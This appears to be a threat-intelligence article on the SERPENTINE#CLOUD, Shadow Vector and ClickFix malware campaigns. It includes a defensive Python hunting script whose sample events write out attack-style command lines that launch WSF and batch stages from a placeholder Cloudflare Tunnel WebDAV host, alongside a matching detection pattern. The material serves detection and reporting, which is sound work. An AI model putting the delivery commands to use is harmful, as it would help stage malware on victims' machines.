Emerging Malware Campaign Leverages Cloudflare Tunnels for RAT Deployment Through Phishing Strategies


A recent campaign, designated as SERPENTINE#CLOUD by Securonix, exploits Cloudflare Tunnel subdomains to distribute malicious payloads via phishing emails that contain harmful attachments. This attack vector utilizes Cloudflare’s infrastructure along with Python-based loaders to deliver memory-injected payloads through a chain of disguised shortcut files and obfuscated scripts, as reported by security researcher Tim Peck.

The malicious operations initiate with phishing emails themed around payments or invoices, containing links to zipped documents. These documents house a Windows shortcut (LNK) file, which is camouflaged as a legitimate document to deceive victims into executing it, thus triggering the infection sequence. The intricate multi-stage process ultimately results in the operation of a Python-based shellcode loader designed to execute payloads packed with the open-source Donut loader strictly in memory.

According to Securonix, the primary targets of this campaign include the United States, United Kingdom, Germany, and various nations across Europe and Asia. The specific identity of the perpetrator(s) remains unrevealed; however, their proficiency in English has been noted.

This threat activity cluster is remarkable for its evolving initial access techniques, transitioning from URL files to LNK shortcut files that mimic PDF documents. Subsequently, these payloads retrieve additional stages over WebDAV through the Cloudflare Tunnel subdomains.

A similar variation of this campaign was documented previously by eSentire and Proofpoint, highlighting its facilitation of further malicious activities involving AsyncRAT, GuLoader, PureLogs Stealer, Remcos RAT, Venom RAT, and XWorm.

The utilization of TryCloudflare provides distinct advantages to malicious actors. By leveraging reputable cloud service providers as a façade for their operations, they effectively obfuscate their activities, complicating detection. Relying on a recognized subdomain (“*.trycloudflare[.]com”) for malicious purposes significantly hinders defensive measures, allowing their operations to evade traditional URL or domain-based blocking techniques.

The infection begins when the victim executes the LNK file, which downloads the second-stage payload, a Windows Script File (WSF), from a remote WebDAV share hosted on a Cloudflare Tunnel subdomain. The WSF file is executed through cscript.exe, keeping a low profile so the victim is not alerted.

This WSF file serves as a streamlined VBScript-based loader tasked with executing an external batch file from another Cloudflare domain. The “kiki.bat” file acts as the primary script for delivering subsequent payloads in the sequence, purposefully designed to operate stealthily and ensure persistence.

The batch script’s primary functions include displaying a benign PDF document, inspecting the system for antivirus software, and downloading and executing Python payloads, enabling the invocation of Donut-packed payloads like AsyncRAT or Revenge RAT in memory.

Securonix suggested that the script may have been generated using a large language model, indicated by the presence of well-structured comments in the source code. They described the SERPENTINE#CLOUD campaign as a sophisticated and layered infection chain that integrates social engineering tactics, living-off-the-land techniques, and evasive in-memory code execution. The exploitation of Cloudflare Tunnel infrastructure further complicates network visibility, allowing the attacker a disposable and encrypted transport layer for staging malicious files without relying on conventional infrastructures.
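The delivery chain above leaves a distinctive trace on the endpoint: a script host (cscript.exe, or cmd.exe for the batch stage) launched with a script path that is a WebDAV UNC path under a trycloudflare.com subdomain. The following hunting logic is an added example, not code from Securonix or from the page; it runs over constructed process-creation events (the hostnames are placeholders) and assumes the Windows WebDAV mini-redirector UNC form `\\host[@SSL]\DavWWWRoot\...`.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample process-creation events (not real telemetry), modelled on the
# chain described above: LNK -> cscript.exe loading a WSF over WebDAV from a
# trycloudflare.com subdomain, then cmd.exe running the batch stage the same way.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r'cscript.exe //nologo "\\placeholder-words.trycloudflare.com@SSL\DavWWWRoot\invoice.wsf"'},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "\\placeholder-words.trycloudflare.com@SSL\DavWWWRoot\kiki.bat"'},
    {"image": r"C:\Windows\System32\cscript.exe",          # benign local script
     "cmdline": r"cscript.exe C:\Scripts\inventory.vbs"},
    {"image": r"C:\Windows\System32\wscript.exe",          # benign SMB share, not WebDAV
     "cmdline": r"wscript.exe \\fileserver.corp.local\share\logon.vbs"},
]

SCRIPT_HOSTS = {"cscript.exe", "wscript.exe", "cmd.exe", "mshta.exe"}
SCRIPT_EXTS = (".wsf", ".vbs", ".js", ".bat", ".cmd", ".hta")
# Windows WebDAV mini-redirector UNC form: \\host[@SSL][@port]\DavWWWRoot\...
WEBDAV_UNC = re.compile(r"\\\\(?P<host>[^\\@\s\"]+)(@SSL)?(@\d+)?\\DavWWWRoot\\", re.I)
TUNNEL_SUFFIX = ".trycloudflare.com"

@dataclass
class Finding:
    host: str
    script: str
    reason: str

def script_paths(cmdline: str) -> List[str]:
    """Return command-line tokens ending in a script extension, quotes stripped."""
    tokens = re.findall(r'"([^"]+)"|(\S+)', cmdline)
    return [a or b for a, b in tokens if (a or b).lower().endswith(SCRIPT_EXTS)]

def analyse_event(ev: dict) -> Optional[Finding]:
    """Flag a script host loading a script from a Cloudflare Tunnel WebDAV share."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    if image not in SCRIPT_HOSTS:
        return None
    for path in script_paths(ev["cmdline"]):
        m = WEBDAV_UNC.search(path)
        if m and m.group("host").lower().endswith(TUNNEL_SUFFIX):
            return Finding(m.group("host").lower(), path,
                           "script host loading script over WebDAV from Cloudflare Tunnel")
    return None

def hunt(events: List[dict]) -> List[Finding]:
    return [f for f in (analyse_event(e) for e in events) if f]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

In production the same check belongs on Sysmon Event ID 1 or EDR process-creation data, paired with a network rule for WebDAV (PROPFIND) traffic to *.trycloudflare.com from workstations.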

In another revelation, Acronis has identified an active malware operation named Shadow Vector targeting Colombian users through phishing emails containing corrupted scalable vector graphics (SVG) files purporting to represent court notifications. Researchers at Acronis reported that attackers are disseminating spear-phishing emails impersonating trusted Colombian institutions, delivering SVG files that link to JavaScript or VBScript stagers hosted on public platforms, or including directly executable payloads within password-protected ZIP files.

This campaign has facilitated the deployment of remote access trojans, including AsyncRAT and Remcos RAT, with recent activities utilizing a .NET loader linked to Katz Stealer. The attack chains often obscure payloads within Base64-encoded text of image files hosted on the Internet Archive.

A critical aspect of this malware campaign is the adoption of SVG smuggling, which allows the delivery of malicious ZIP files through SVG files hosted on popular file-sharing services such as Bitbucket, Dropbox, and Discord. The downloaded archives typically include both legitimate executables and malicious DLLs, with the latter sideloaded to ultimately deploy the trojans.

Researchers indicated that this evolution in SVG smuggling adopts a modular, memory-resident loader capable of executing payloads dynamically and entirely in memory, which leaves minimal traces for detection. The presence of Portuguese language strings and method parameters within the loader suggests a possible connection to TTPs commonly linked with Brazilian banking malware, hinting at potential code sharing or regional actor collaboration.

Furthermore, there has been a noticeable surge in social engineering attacks utilizing the ClickFix tactic to deploy stealers and remote access trojans, such as Lumma Stealer and SectopRAT, disguised as fixes for issues or CAPTCHA verifications. Data shared by ReliaQuest indicates that drive-by compromises constituted 23% of all phishing tactics observed between March and May 2025, with ClickFix tactics being pivotal in enabling drive-by downloads.

ClickFix proves effective primarily through its ability to mislead targets into performing seemingly innocuous, routine actions, which are typically overlooked as harmless. This method compels users to inadvertently contribute to the infection process, circumventing the need for sophisticated exploit mechanisms targeting software vulnerabilities.

ReliaQuest noted a shift away from external resources as the primary attack strategy toward an increased emphasis on exploiting user error rather than technical vulnerabilities. This transition is likely driven by the simplicity, high success rate, and adaptability of social engineering tactics such as ClickFix.